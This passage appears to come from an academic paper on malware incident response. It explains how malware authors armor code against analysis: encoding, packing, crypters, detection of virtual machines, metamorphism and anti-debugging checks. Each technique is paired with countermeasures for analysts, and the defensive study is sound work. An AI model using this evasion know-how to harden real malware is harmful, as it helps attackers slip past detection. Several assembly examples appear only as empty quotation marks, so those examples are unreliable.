Creating Anti-Virus (A/V) identification and cleaning signatures is typically done under support contract by the A/V vendor. A sample of the malware specimen is submitted to the AV vendor for analysis, with a custom signature returned to the enterprise once it has been created and tested. Since this signature creation can take some amount of time, the process of submission should be started as quickly as possible. Upon receipt of the new signature, distribution should take place as quickly and broadly as possible. Most modern threats have the ability to spread in an automated fashion using several different vectors, so broad distribution is required.

The spread of these malware threats is largely due to vulnerabilities in the platforms and applications in use by the organization. For this reason, patching against these identified vulnerabilities is an important step in the eradication phase. When all systems are patched against the exploits coded into the malware, automated spread via infection is severely curtailed.

In addition to platform and application vulnerabilities, malware can exploit weak or common passwords and insecure default configurations. Malware often includes routines for brute forcing and dictionary lookup attacks. By strengthening these weaker instances of a control, the threat of spread is reduced.

In order to ensure that the spread of the malware is contained, and that eradication efforts are effective, threat specific monitoring routines should be implemented in the environment. These specific monitoring routines may be in the form of N-IDS signatures designed to alert on matching network

strings, network perimeter alarms that alert when a specific Internet destination is attempted, or may be in the form of file signatures calculated as part of a file system integrity solution.

3.6. Recovery The goal of the Recovery phase is to put the impacted systems back into production in a safe manner (SANS, 2006). Once the threat has been removed from the environment, the task of recovering work product interrupted by the infection can commence. Since the typical response to a malware infection is to remove the infected machine from the network, effort must be made to ensure that any data migrated back to the network is free of the threat that started the incident. Using the same cleaning and monitoring tools outlined above the organization can systematically recover data from backups (or the infected systems itself) and return it to the production environment. The advances in identification capability, containment, and eradication should immediately alert the organization of any remaining infection in the recovered data.

In addition to moving the data back into production, the recovery stage is also the stage where other groups within the organization can be apprised of the incident so as to deal with the impact of the incident. In some cases there may be some Legal repercussion of the incident (e.g.: control of licensed content lost) that will require intervention by the Legal staff. There may also be a requirement to adjust a marketing plan or some other product related strategy as a result of industrial secrets that have been compromised in a malware-based breach.

These two areas, and potentially others, are all dealt with in the recovery stage and are designed to return the organization to a healthy, competitive stance.

3.7. Lessons Learned The goal of the Lessons Learned phase is to document what happened and improve the organizations capabilities (SANS, 2006). By assessing the incident, from infection to identified impact, an organization can evaluate the controls for their effectiveness in stopping identified threats. This evaluation should provide a list of areas that can be given priority from the perspective of compensating control implementation. The controls identified in the lessons learned phase might not all be technical (computer system based) controls. Often these controls will be softer controls like employee training and awareness activities; as computer systems become better secured, vulnerabilities like social engineering become even more prevalent.

3.8. Conclusions Incident Response is all about effective, timely, and consistent response to some negative event. The response must be effective and must be able to immediately show some reduction in the negative impact of the event. If the current response is not showing some reduction in impact, the response must be changed. Changing a response plan midway through an incident can be costly from a loss perspective, which is why a consistent and planned response is so important. Planning and testing a response prior to the incident occurring can effectively eliminate any wasted time or resources spent in the misguided response to the incident. The planned response must take into account the key assets and critical business factors important to the organization. These assets and business factors should be identified and defined in the Security Policy. In this way, the response will be measured according to the impact of the event and according to the importance of the attacked assets within the organization.

4. Armoring Techniques

4.1. Introduction The goal of all armoring techniques is to delay or stop the analysis of an executable by either behavioural observation and/or reverse engineering. By delaying or stopping the analysis of the executable, the author ensures both a maximized effective lifespan in the network (Intranet or Internet) and the anonymity of both the attackers and their controlling servers. Effective lifespan is described as the amount of time that the malware can exist within a system or network without being detected by mainstream detection mechanisms like those defined in Section 3.3. The effective lifespan is maximized due to the following capabilities:

1) Hidden methods of spread and infection, and 2) Unknown capabilities of the malware, and 3) Resistance to identification and classification.

Before the malware specimen has been identified as malware, there is an opportunity to have the malware spread across a multitude of networked computer systems. Since no monitoring signature has been defined to alert on the malware, the malware can continue to spread unhindered via methods that have not been documented. Further, A/V solutions will not have an understanding of the various capabilities within the malware, which may reduce the effectiveness of the early versions of the detection and eradication signatures. 30

As new malware versions are developed, capabilities are added to the malware that resist efforts made by the infected organization to remove the malware. Organizations will have limited success in cleaning a system if they are not able to identify all of the locations in which the malware has embedded itself.

Lastly, some of these newly added capabilities actively defend the presence of the malware on the infected machine. Capabilities like poly- or meta-morphism, multi-partite malware or even malware that hides itself in the boot sector of an infected computer are often not properly identified and thus not properly eradicated.

In a similar (but opposing) fashion, for those doing the analysis, their motivation to break the armoring will be one (or more) of

1) Development of a compensating control against the malware threat, 2) Quantification of incident impact, 3) Technical curiosity or research (includes “borrowing” of another malware writers techniques)

For analysts tasked with developing/maintaining compensating controls, including network IDS/IPS, Host IDS/IPS, anti-virus signatures, and the others described in the Incident Identification section (Section 3.3), malware analysis is undertaken to assist in the development of re-usable and reliable signatures for detecting the malware.

For many commercial organizations, the most important reason to perform an analysis of a malware specimen is to try to quantify the damage done, or the intellectual property lost, from a malware incident.

Researchers, hobbyists, and other malware authors will also undertake binary analysis of malware to try to keep abreast of, or move beyond, current technical capabilities found in malware. The malware/Anti- Virus conflict can be compared to a “cold war like” escalation of ever increasing capabilities and defenses.

All of the following techniques can be used, often additively, to add protection to the malware in order to cause delays or abandonment of the analysis. Some of these techniques may also assist in keeping the malware hidden, thus evading detection by the very tools designed to identify these threats.

Each of the techniques described below will be examined using the same basic format in an effort to answer the following questions:

1) What is the armoring technique, and how does it work? 2) Why are hackers utilizing this armoring technique? 3) How does this armoring technique defeat the traditional analysis cycle? 4) What can defenders and investigators do to defeat this armoring technique.

These four questions will organize the important facts about each of the armoring techniques. A discussion on what the armoring technique is and a section will follow how it works on the benefits that the armoring technique offers to the malware author. Lastly, an examination of how this armoring technique impacts the binary analysis process from the perspective of the forensic investigator will be provided. Where possible, either an overview of current research or suggested alternative procedures will be outlined that may hold promise over the specific armoring technique.

4.2. Encoding There is a family of armoring techniques that all revolve around obfuscating the display of the inner workings of the malware from the analyst. These encoding techniques do not alter the malware’s execution flow; rather they simply mask the user input/output routines under a vale of obfuscation.

4.2.1. String Encoding String encoding is a function that replaces every ASCII character based, english readable, string with an encoded equivalent. The basic function works as shown in Figure 9. Every standard string is known and defined at compile time and is built into the malware. By using a simple substitution routine the encoded character string can be returned to its original state just before being sent to the console or C&C server.

Figure 9 - String encoding/replacement

The goal of armoring a piece of malware is to enable it to remain hidden for as long as possible and to hide its inner workings. Strings like destination IP addresses, C&C commands, even error strings, can reveal information about the threat that can be used in the implementation of compensating controls. By replacing every string inside the malware with an encoded equivalent, it becomes more difficult to ascertain the true capabilities of the executable, the actual C&C commands and their networked destinations, or the mission of the executable.

Universally, a leading step in the analysis process is to complete a simple dump of the binary, looking for strings. Strings are defined as a sequence of UNICODE (or ASCII) [characters] of a default length of 3 or more UNICODE (or ASCII) characters (Russinovich, Strings v2.41, 2009). The strings found in a binary will include the command/control messages, the error messages, and network settings, including URIs, commands, usernames, and passwords. Armed with this knowledge, the analyst may have sufficient information to identify files related to the function of the malware in order to ascertain network addresses that can be blocked at the perimeter, etc.

Typically, this first step of dumping the ASCII strings from within a piece of malware is made ineffective by malware authors using string encoding. However, as an alternative to simply dumping the strings within the malware, the malware could be opened in a debugger or disassembler and analyzed to identify the encoding function. Once the encoding function is identified, each of the encoded strings, also identified in the disassembly process, can be manually decoded to identify its actual message. These extra steps required to de-obfuscate the ASCII strings will add a significant amount of time and effort to the manual analysis process. If the obfuscation or encoding sequence is complex enough, employing this armoring technique alone may lead to the abandonment of the analysis by the investigator.

4.2.2. Payload Encoding (Encryption) Payload encoding works much like string encoding discussed above, but is applied to the communication between victim and controller over the network. Prior to sending any communication over the network, the data is put through an encoding or encryption algorithm. In this case, the difference between

encoding and encryption is the complexity and resistance to cryptanalysis of the encoding algorithm. The function works like shown in Figure 10:

Figure 10 - Payload Encoding

Payload encoding can also be applied to payloads stored on the local storage medium of the infected computer. Many instances of malware include the ability to copy every keystroke into a file, and at regular intervals this content is uploaded to the C&C server. Between these intervals, the key logs are stored in local files on the infected computer. These key log files will also be encoded or encrypted in the same fashion as the network traffic.

Similarly, hackers use this technique to evade network detection and to evade analysis of the captured material. Network Intrusion Detection Systems (N-IDS) are programmed to alarm when a matching sequence of characters is observed over the network connection. Many frequently used command and control strings are programmed into N-IDSes in an effort to identify infected systems. Infected systems employing a method of encoding or encryption on their network communications will be hidden from view by these N-IDS systems.

One of the steps in the assessment of an infected computer is to perform a media analysis of the hard drives within the system. It is during this analysis that a key log file will be discovered. If the key log file is encoded or encrypted, the file’s discovery will be the first and last step of the analysis. The attacker will have safely hidden the extent (or impact) of the data captured and [possibly] exfiltrated out of the company.

Malware is often analyzed in part by the network traffic it transacts. By collecting the network traffic being sent to and from the infected computer, the analyst can gather a great deal of information about what is being sent between to the infected computer and the C&C server. If the analyst encodes this 34

traffic in a way that eludes simple decoding, the analyst will have no network detail to contribute to the assessment of the impact or threat posed by the malware. This also applies to any files saved local to the infected system – the analyst will discover the files, but no additional insight into the mission or impact of the malware will be known.

In much the same way as described for string encoding, unless the decoding/decryption algorithm is known to the analyst, the insight offered by network traffic analysis and local file analysis will be minimal. An analyst may be able to open the malware in a debugger or disassemble and identify the routine responsible for the encoding of the data, but the task will be quiet laborious and may even lead to the abandonment of the analysis of the malware.

4.2.3. Executable packing A packer is a tool that is used to compress an executable (or DLL). In the process of compressing the file, a decompressor stub is added to the original executable. Much like the .zip or .rar style compressors, these programs look for runs or repeating sets of characters in the various sections of an executable and replace those sets of characters with a shorter symbol. In the windows environment, standard executables are in the form of the Portable Executable or PE file format.

The standard PE file format is shown in Figure 11. The PE file on disk is laid out similar to how the process will be laid out in memory. PE files consist of a number of headers and sections that tell the Windows loader how to map the file into memory. Every section in a PE file is mapped into a different region of memory (and therefore must be page-aligned; this is the Section Alignment in the PE header) with different permissions (Websense). Thus the effort required for the loader to take an image from disk and create a process is Figure 11 - PE File Layout (Pietrek, 1994) minimal. The loader uses the memory- mapped file mechanism to map the appropriate pieces of the file into the virtual address space. Once the module has been loaded, Windows can effectively treat it like any other memory-mapped file

(Pietrek, 1994). For the Windows 32-bit environment, or “Win32”, all of the memory used by the module for code, data, resources, import tables, export tables, and other required data structures is in one contiguous block of memory. All of the pieces of the module can be found by following the pointers that are stored in the PE file header contained within the image (Pietrek, 1994). The main PE header is a structure of type IMAGE_NT_HEADERS, which contains two substructures named IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER. The IMAGE_FILE_HEADER contains information regarding the supported CPU, the number of sections, the date-stamp from the linking process, and a few pieces of data that support the number and loading of Symbols.

The IMAGE_OPTIONAL_HEADER is the structure that contains the information that will be used when the file is packed, such as SizeOfImage, SizeOfHeaders, and SubSystem. The IMAGE_OPTIONAL_HEADER structure is laid out in Figure 12.

After the PE header, there are a number of IMAGE_SECTION_HEADER (Figure 13) structures. The number of structures following the PE header is defined within the IMAGE_FILE_HEADER structure. These IMAGE_SECTION_HEADERs contain information about each of the sections, including the size (in memory), the relative address (to the start of the ImageBase; defined in IMAGE_OPTIONAL_HEADER), a Figure 12 - IMAGE_OPTIONAL_HEADER (Websense) pointer to the start of the data within the section, and the characteristics of the section (Websense) (Pietrek, 1994).

In addition to protecting a Windows executable, packers perform various modifications on PE files, such as adding a new IMAGE_SECTION_HEADER in the SECTION_HEADER_TABLE (in other words, adding a new section to the file with the appropriate characteristics), updating the Entry Point relative virtual

address (RVA), and updating the SizeOfImage (Websense). These additions to the executable contain the code required for the loader of the packer (the component that will decompress and re-construct the packed file). The number of sections will also be increased by one due to the added loader section; as well, all of the documented size fields are updated. Finally, the packer updates the EntryPoint field, which holds the location of the first executable instruction, now the first instruction of the packer’s loader. Figure 13 - IMAGE_SECTION_HEADER (Websense)

The loader within a packer is responsible for the following tasks:

1) Self decryption of the loader 2) Decompression and decryption of the remaining sections into memory 3) Relocation handling for DLLs 4) Import table handling (the part of the loader that mimics the Windows PE Loader and fills the Import Address Table) 5) Jump to the original entry point (saved at packing time) (Websense)

From an examiners perspective, all of the armoring is done within the loader portion of the packer, so it is important for the author of the packer to implement some level of encryption and/or debugger detection into the loader. The loader also decompresses all of the sections of the executable and places them back into the proper address space (in accordance with RVA and ImageBase). The loader also reconstructs the location of handlers for DLLs and the Import Table entries. Finally, the loader jumps to the original entry point (OEP) of the executable. By this time, the process has been reconstructed in memory and the first original instruction has begun. Notice that at no time was the unpacked executable placed on any persistent storage media, like the disk drive.

As is clear from the preceding discussion, packing an executable offers many advantages to the malware author. The primary advantages are:

1) Gains in protecting the executable from reverse engineering or analysis. 37

2) Unpacked image is never written to disk, bypassing many host based protections 3) Packing can be considered an IDS evasion tactic, as known file signatures are obfuscated 4) Packers reduce the size of executables – useful for covert transmission of payloads.

Not only does this armoring technique make the malware difficult to reverse engineer by the investigating analyst, but the packer can also protect the intellectual property of the malware author – from the authorities, analysts and other malware authors. Given the modular design of a packer, it is also possible to implement an inline function that adds an element of encoding (or encryption) [see Section 4.4] to the packed file (Websense).

The most powerful part of using a packer is that the malware never is stored on the local hard disk. Everything is run as in-process memory, which can generally bypass most antivirus and host-based security tools. Only if the packer is known, an antivirus engine can identify the threat as it unpacks the malware. (Davis, Bodmer, & LeMasters, 2010)

In addition to bypassing most host-based protections, packed executables can more easily evade N-IDS monitoring because ASCII strings and sequences of instructions are compressed and/or encrypted, the transmission of such content often does not alert the listening N-IDS. When the N-IDSes are blind, so will the Security Operations and Forensic Examination staff.

Lastly, packers serve another useful feature for evading detection: bandwidth reduction. Large, bandwidth-consuming transfers of information are easily identified when other production services are delayed due to contention on the transmission line.

Packed malware can defeat the traditional analysis cycle in a few key ways. The first is that it is difficult, sometimes impossible, to unpack an executable into a format that is conducive to analysis. In these difficult cases, the executable may have to be reconstructed using a memory dump, with an external tool used for the Import Table reconstruction. The second is that packers are often implemented with a multitude of armoring techniques that confound analysis. Each of the armoring tactics discussed in this paper can also be applied to the single purpose loader.

Since the detection of executables is often done by comparing the sample against known signatures made up from typical PE file structures and organization, detection will be less reliable and accurate due to packing. The traditional approach to detect malware, as implemented in anti-virus scanners, is based on (string) signatures that match speciﬁc malware binaries (Szor, 2005). Since code obfuscation and

runtime packing can be used to easily evade this type of detection, researchers have proposed more sophisticated techniques, for example, detection based on model checking (Christodorescu & Jha, Static Analysis of Executables to Detect Malicious Patterns, 2003), recognition of structural similarities between malware samples (Kruegel, Kirda, Mutz, Robertson, & Vigna, 2005), and semantics-aware analysis of code templates that implement speciﬁc functionality (Christodorescu, Jha, Seshia, Song, & Bryant, 2005).

In addition to these areas of research of identifying malware, there are also research projects centered on memory forensics and executable extraction from memory. Tools like Volatility, Nigilent32, and others plan to improve the accessibility of process and executable information from the memory of running systems.

4.3. Virtual Machine Environment (VME) Detection It has been shown in the last number of years that certain CPU instructions, executed in the correct order, will identify whether an executable is running inside of a virtualized environment. (Rutkowska, 2004). Further research has shown that CPU semantics attacks (Dinaburg, Royal, & Lee, 2009), (Ferrie, 2007), (Kang, Yin, Hanna, McCamant, & Song, 2009) based on differences between emulated and real CPUs are also used actively by malware in the wild. The checks used by these attacks exploit undocumented side-effects of x86 instructions or look for the presence of CPU speciﬁc mode registers that are typically not present on the emulated processor (Balzarotti, Cova, Karlberger, Kruegel, Kirda, & Vigna, 2010).

There are 3 primary checks that are done to identify if the environment is virtualized:

1) Observation of the Interrupt Descriptor Table Register (ITDR) 2) Observation of the Global Descriptor Table (GDT) 3) Observation of the Local Descriptor Table (LDT)

In 2004, a security researcher named Joanna Rutkowska (Rutkowska, 2004) observed that the ITDR can be analyzed after an SIDT call to indirectly identify whether the machine executing the SIDT call was within a virtualized machine. She observed that in both VMware and Microsoft VirtualPC, the Interrupt Descriptor Table (IDT) is higher in memory than when the machine was not virtualized.

Figure 14 - Redpill VME detection routine (Rutkowska, 2004)

She then wrote a single line program, show as Figure 14 that reported back whether the IDT was located below address 0xd0000000. If the returned address was above memory address 0xd0000000, the machine was concluded to be running within a virtual environment. With the advances of security monitors like grsecurity (Spengler, 2011) and PAX (the PaX team), the SIDT call is not permitted unless specifically allowed, which causes this particular VME check to fail.

Beyond the IDT, there are other critical operating system structures an attacker can look to for detecting VMEs, notably the Global Descriptor Table (GDT) and the Local Descriptor Table (LDT). The GDT is a data structure used by Intel x86-family processors in order to define the characteristics of the various memory areas used during program execution, for example the base address, the size and access privileges like executability and writability (Intel, 1999). The LDT is much like the Figure 15 - LDTR, GDT based VME detection (Klein, 2010) GDT, except that the GDT is a system wide table that does not get swapped or context switched. The 40

LDT will be switched when execution context goes from one process to another. Additionally, there will be generally one LDT per user process, describing privately held memory, while shared memory and kernel memory will be described by the GDT (Intel, 1999). Due to the implementation of the VME, these two tables can provide clues about whether the running system is virtualized or not. Tobias Klein wrote routines shown as in Figure 15 that can be used to return the locations in memory of these tables, and based on the location of these tables, the routine can determine if the machine is virtualized (Klein, 2010).

In addition to kernel structure differences, most VMEs have device drivers that optimize the use of shared and/or virtualized hardware. Often, these device drivers can be enumerated and then queries can be made looking for strings that identify the environment as virtual.

Finally, the most popular VME detection mechanism of all, and the most widely used in malicious code today involves detecting the presence of the VMware by detecting the communications channel VMware uses to send data between guest and host. This channel, implemented by adding some functionality to the “ machine language instruction on VMware guests, is used for shared clipboards, file sharing, and drag and drop features between guests and host systems in VMware (Liston & Skoudis, 2006).

If a piece of malware is able to detect whether the environment is virtual, it can execute differently than if the malware is executing on “bare metal” hardware. Thus, hackers use VME detection to hinder analysis by returning fake or manufactured results in an effort to divert attention away from the actual goals of the malware. Most, if not all, modern malware analysis systems use some form of virtual machine technology. The following features of VME allow both the automated analysis and manual analysis to be done much more efficiently:

1) Multiple, simultaneous operating systems, 2) Ability to reset to a previous “snapshot” (undoing any changes made by the malware), 3) Easily monitored, and 4) System and network isolation (Liston & Skoudis, 2006).

If the malware behaves differently when executed in a VME environment, the malware will stay invisible to automated analysis systems, and in so doing, the malware programs can operate (and generate revenue) for a longer period of time. (Balzarotti, Cova, Karlberger, Kruegel, Kirda, & Vigna,

2010). Because so many security researchers rely on VMEs to analyze malicious code, malware developers are actively trying to foil such analysis by detecting VMEs. If malicious code detects a VME, it can shut off some of its more powerful malicious functionality so that researchers cannot observe it and devise defenses. Given the malicious code’s altered functionality in light of a VME, some researchers may not notice its deeper and more insidious functionality. (Liston & Skoudis, 2006)

This armoring technique is used to evade the analysis required to identify the impact and capabilities of the malware. If a malicious executable behaves uniquely when run in a virtualized environment than when run in a bare metal environment, the response plan devised by the analysts and examiners may not prove effective in the real world landscape of the commercial network. This poor response will lead to additional data loss, additional infections, and possibly the failure of complete eradication of the threat from the network.

It has been shown that there are 2 classes of response to the problem of VME aware malware. It is clear that the analysis of malware must be automated (in some fashion) in order to keep up with the number of unique instances of malware that are presented “in the wild”. One class of approaches focuses on the development of analysis platforms that are more difficult to detect by malicious code. A second class of approaches to address the problem of analysis-aware malware is to detect the fact that a malware sample behaves differently in different environments (Balzarotti, Cova, Karlberger, Kruegel, Kirda, & Vigna, 2010). This is consistent with the ﬁndings from a related study (Chen, Andersen, Mao, Bailey, & Nazario, 2008), in which the authors show that about 4% of malware samples behave differently when run inside a virtual machine.

4.4. Run-time decryption Run-time decryption is similar in most ways to a packer, with the exceptio that instead of singularly using a compression algorithm to reduce the size of an executable, the executable is compressed, encrypted, and then written to disk. This section will highlight only the differences in packers and “crypters”; and as shown in Figure 16, nearly the whole process of transforming an executable into an encrypted executable is the same as packing a file using packing technologies discussed in Section 4.2.3.

Figure 16 - Packer and Cypter Comparison (Aquilina, Casey, & Malin, 2008)

Like a packer, in that the un-packing routine is distributed with the executable, the decryption routine in a crypted executable is stored inside the executable and is distributed with each copy of the executable. As shown pictorially in Figure 17, the crypter function is attached to the end of the executable file as an additional section (see Section 4.2.3 for PE file description).

Figure 17 - Runtime Decryption - Executable View (Oreans Technologies, 2008)

Malware authors will use these crypting tools for all of the same reasons as one would use a packer:

1) Gains in protecting the executable from reverse engineering or analysis, 2) Decrypted image is never written to disk, bypassing many host based protections 3) crypting can be considered an IDS evasion tactic, as known file signatures are obfuscated

Absent from the list is the file compression benefit, as some encryption algorithms will add content due to content padding, field or block alignments and other additional data storage requirements unique to the crypter. However, most crypters have added the features required for the malware author to add other armoring techniques to the crypted file (Figure 18).

In much the same way as packed malware or crypted malware can defeat the traditional analysis cycle by confounding the binary analysis efforts, crypted executables are difficult, sometimes impossible, to decrypt into an executable format that can be analyzed using standard processes. In these difficult cases, the executable may have to be reconstructed using a memory dump, with an external tool used for the Import Table reconstruction. If the crypted malware has other armoring techniques applied to it, reconstructing the executable from the contents of memory may also fail due to those armoring techniques. Figure 18 - Crypter with armoring options (xinfiltrate) In much the same way as a packer can be defeated by manually unpacking the executable, a crypted executable can be manually decrypted and returned to its native machine ready state. Since the decryption routine is attached to the executable, the analyst has all the required data to defeat the armoring technique. However, since this decrypting must be done within some type of debugger, it can be a long, tedious, and error-prone activity. Similar to other armoring techniques, crypting an executable may lead to abandonment of the analysis.

Since the detection of executables by both network and host based systems is often done by comparing the sample against known signatures made up from typical PE file structures and organization, detection can be less reliable and accurate due to crypting.

Once a crypter has become publicly known, for instance, when used in a mainstream threat, information security professionals will develop an automated routine to properly decrypt the file. This file then is added to the “tool kit” of many malware response and forensic examiners for use if or when a similar threat is found in their organization. Accordingly, the crypter and malware authors continue to develop new versions of their crypters in an effort to stay ahead of the detection and remediation process.

4.5. Polymorphism and Metamorphism One of the shortcomings of runtime-encrypted malware is that while the virus body looks different from generation to generation, the decrypter that is embedded in the virus remains constant for all generations. As a result, it is possible to detect the virus indirectly by recognizing the code pattern of the decrypter (Lin, 2009). Polymorphism is a particularly robust form of runtime encryption. A polymorphic virus generally makes several changes to the default encryption settings, as well as altering the decryption code. In a polymorphic virus, the content of the underlying virus code body does not change; encryption alters its appearance only. (National Institute of Standards and Technology (NIST), 2005)

In contrast to polymorphism, the idea behind metamorphism is to alter the content of the virus itself, rather than hiding the content with encryption. (National Institute of Standards and Technology (NIST), 2005). Figure 19 shows the 5 typical execution phases of a metamorphic virus, starting with the capability to locate its own code within the host program, then decode, analyze, transform itself to a new entity, then finally reattach to a new host. Metamorphic malware is somewhat different from a metamorphic virus in that the malware doesn’t attach itself to a host program, but it will still follow the same inner steps of decode, analyze, and transform.

Figure 19 - Anatomy of Metamorphic Engine (Walenstein, Mathur, Chouchane, & Lakhoti, 2007)

The metamorphic transformation techniques include

1) Equivalent instruction substitution, 2) Register swapping 3) “Garbage” or “dead code” insertion, and 4) Rearrangement of instruction/subroutine order 5) Transposition (only if no ordering dependencies in code) (Lin, 2009)

Instruction substitution is the replacement of an instruction or a group of instructions with an equivalent instruction or group. For example, “ ”‖ is equivalent to “ ” and “ ” can be replaced by “ ” then “ ”. 45

Register swapping is a method whereby the malware mutates itself by swapping the operand registers with different registers. For example, the program could swap all occurrences of “ ” with “ ” and all occurrences of “ ” for “ ”. “ ” can be considered an extension of “ ”, and these two registers are not typically used for any other function (Swanson, 2003), so this pair of registers is a good candidate for this metamorphic technique.

Another effective metamorphic technique is the insertion of garbage instructions. Garbage instructions are instructions that are either not executed (dead code) or have no effect on program outcomes (Al Daoud, Jebril, & Zaqaibeh, 2008). As shown in Figure 20, by inserting garbage instructions between core instructions randomly (separated by instructions), a program can potentially generate infinite unique copies.

Figure 20 - Insertion of garbage instructions (Al Daoud, Jebril, & Zaqaibeh, 2008)

Garbage instructions are those dead code instructions that are usually inserted between a “ ”‖ instruction and the location being jumped to, which holds the next actual instruction. Any instructions between the “ instructions and the next actual instructions should not affect the processor state or be executed. A table of garbage instructions that have no effect on the processor state or execution path of the malware is shown in Figure 21.

Figure 21 - Common Garbage (or junk) Instructions (Orr, 2006)

Subroutine permutation is a technique that changes the appearances of malware by reordering the malware’s subroutines. If an example of malware has n different subroutines, then it can generate n!

different generations without repeating (Lin, 2009). Since the subroutines themselves are not changed, only their order within the program, monitoring solutions may still identify malware armored with this technique due to known strings being matched.

Transposition is the reordering of the instruction execution sequence. This can only be done if the affected instructions have no dependency between them. For example, if the second instruction does not depend on the result of the first instruction, then the execution order of these two instructions can be swapped. Consider the following example from (Lin, 2009):

We can swap the above two instructions only if: 1) not equal to ; and 2) not equal to ; and 3) not equal to . While the above techniques for creating metamorphic malware provide great benefit to the malware author, metamorphism does not come without cost. As shown in Figure 22, as much as 80 percent of the malware’s code base is devoted to the metamorphic routines. Addition of these metamorphic techniques will also add significant complexity to the malware.

Disassembler Permutator Random Compressor Assembler Inserter

80 % 20 % Morphing Engine Malicious Code

Figure 22 - Breakdown of MetamorphicCode Malware (Driller, 2002) (Hosmer, 2008)

A strategy recently devised to offer the benefits of polymorphism and metamorphism while not adding considerable complexity to the malware itself is known as “server-side polymorphism” (Wismer, 2007). Instead of having the malware carry the transformation routines within it; the malware is either transformed upon distribution from the server, or the malware is updated to a transformed version of 47

itself after initial infection. This methodology has proven to be quite effective and difficult to counteract when it comes down to the traditional anti-malware model. Server-side polymorphism is so hard to detect because the transformation functions (the routines used to change the signature of the code) are not visible to the virus analyst. The actual algorithms or techniques cannot be studied to the degree necessary to create an effective vaccination (Sherstobitoff, 2008).

As discussed, the primary use for polymorphism and metamorphism is to evade detection by signature- based and heuristic- based tools. Since the executables are being changed [typically] every time the program is transferred across a network, monitoring programs looking for specific signatures will fail to identify the transfer as being part of a malicious infection or attack. Many early generation heuristic based monitoring programs will look for sequences of operations in a row and determine that the series has malicious intent. Any randomly inserted “junk” instructions will obstruct the heuristic identification of malicious instruction sequences.

This armoring tactic removes the potential to extend any conclusions gathered from the analysis of a single piece of malware. A typical response from the analysis of a piece of malware might be the insertion of a compensating control, like an A/V signature designed to identify and delete a file based on physical characteristics like cryptographic hash, file size and date, and/or series of matching instruction codes in the executable. In the case of metamorphic malware, this A/V signature would only match on that particular strain of malware, and it is likely that there will never be another instance of that malware which would positively match the signature.

Presently, there are many areas of research focused on the effective identification and automated counter measures against metamorphic (and, to a lesser extent, polymorphic) malware. It seems though, that currently the most effective counter measure against widespread adoption of metamorphic malware is the difficulty and complexity in developing robust metamorphic routines as described above.

4.6. Anti-Debugging Anti-debugging techniques are ways for a program to detect if it is running under the control of a debugger. Software developers in both criminal and commercial environments use anti-debugging techniques to prevent or slow-down the process of reverse engineering (Falliere, 2007). When used in commercial environments, the goal of the software developer is to confound the efforts of hackers who are trying to bypass the licensing or activation scheme of the commercial software. Hackers must use debuggers in order to successfully understand the design of the licensing or activation mechanism. 48

Therefore, if protection is added to prevent the code from being run from within a debugger, hackers may abandon attempts to reverse engineer such software because they have just lost the use of their most valuable tool (Zhang, 2010). On the other hand, hackers are using these same techniques to prevent or slow-down the process of binary analysis, an important step in the traditional incident response process.

Anti-Debugging techniques can be split into 6 classes. There can be multiple implementations in each of the classes, but the classes themselves are non-overlapping. These classes will be described in detail, but as all of the classes are designed to either prevent or slow-down the analysis of a binary, the questions of “Why do hackers use this technique?” and “How does this armoring technique defeat the traditional analysis cycle?” will not be repeated.

4.6.1. API Based Detection There are functions available within the Windows API to identify whether a debugger is attached to a process. A C-style function showing how the API could be used is shown in Figure 23. This function could be called on a regular basis, resulting in the immediate termination of the running process.

Figure 23 - isDebuggerPresent API use (Veracode, 2008)

If used in a tight loop within the malware (like the unpacker, decrypter, or I/O decoding routines), this API based detection could be very effective in delaying the unrolling of the loops required to properly analyze the malware.

Since this function must be available outside of the packed or encrypted content, it is possible to directly edit the malware and bypass this API routine entirely, thus removing the debugger restriction from the malware.

4.6.2. Process and Thread Block Detection As described above, relying on the higher level API to return the status of isDebuggerPresent is prone to bypass due to direct editing of the malware. However, by moving lower in the application stack and

bypassing the API call in order to directly query the process and thread information to indicate the existence of a debugger is more difficult to bypass. A similar implementation of the function above (in Figure 23) is shown below (in Figure 24), but bypasses the API and instead queries the Process Environment Block directly.

Figure 24 - Query PEB directly (Veracode, 2008)

In much the same way as the API call, direct editing of the malware to remove or invalidate the call to check the value of will remove the debugger restriction. However, if this routine is placed inside the packed or crypted body of the malware, the malware will need to be unpacked/decrypted into memory first and then dumped to a file for editing. The catch here is that the dumping of a process to a file is typically undertaken with a debugger.

4.6.3. Hardware and Register Based Detection In keeping with the idea of moving closer to hardware in order to reduce the opportunity to bypass the detection routine, having the malware directly access the CPU registers themselves to query the isDebuggerPresent status is the next class of debugger detection. There are several Registers that can be queried, including the

1) Flags Register, or the 2) Stack Segment Register, or the 3) Debug Registers.

If the program is being debugged, the TRAP flag will be set in the Flags register. Querying the Flags register and exiting the malware if TRAP is set can be an effective anti-debugging technique. (Falliere, 2007)

The Stack Segment register can also be used to identify if a debugger is running. If the following sequence of commands is run (Figure 25), the CPU will execute the , and then the next instruction will be executed, but won’t break on it, thus stopping on the function. The following instructions will then identify if a debugger is connected. By implementing this sequence of instructions the investigators will have no opportunity to re-set the flag before the malware can determine the isDebuggerPresent status (Falliere, 2007).

Figure 25 - Using Stack Segment to protect TRAP Flag (Falliere, 2007)

Finally, many debuggers use the Debug Registers (DR0 – DR7) to hold hardware breakpoints. Malware could either check for the insertion of valid addresses into the registers (shown in Figure 26), or simply clear out the contents of the register as a method of blocking the debugger (Falliere, 2007).

Figure 26 - Checking for use of Debug Registers (Veracode, 2008)

In each of these instances of debugger detection, recognition of the tactic, knowledge of assembly language programming, access to an unpacked/decrypted executable and a hex editor can be used to bypass the technique.

4.6.4. Exception Based Detection An exception is an event that occurs during the execution of a program, and requires the execution of code outside the normal flow of control. There are two kinds of exceptions: hardware exceptions and software exceptions. The CPU initiates hardware exceptions. Software exceptions are initiated explicitly by applications or the operating system. For example, the system can detect when an invalid parameter value is specified. Structured exception handling is a mechanism for handling both hardware and software exceptions. (Microsoft , 2010). Vectored exception handlers are an extension to structured exception handling. An application can register a function to watch or handle all exceptions for the application. Vectored handlers are not frame-based; therefore, you can add a handler that will be called regardless of where you are in a call frame. Vectored handlers are called in the order that they were added, after the debugger gets a first chance notification, but before the system begins unwinding the stack (Microsoft, 2010).

As shown in Figure 27, the Vectored Exception Handlers, the Structured Exception Handlers, and the UnHandledExceptionFilter are chained together to handle all exceptions. The trailing UnHandledExceptionFilter at the end of the chain is there to catch all previously unhandled exceptions.

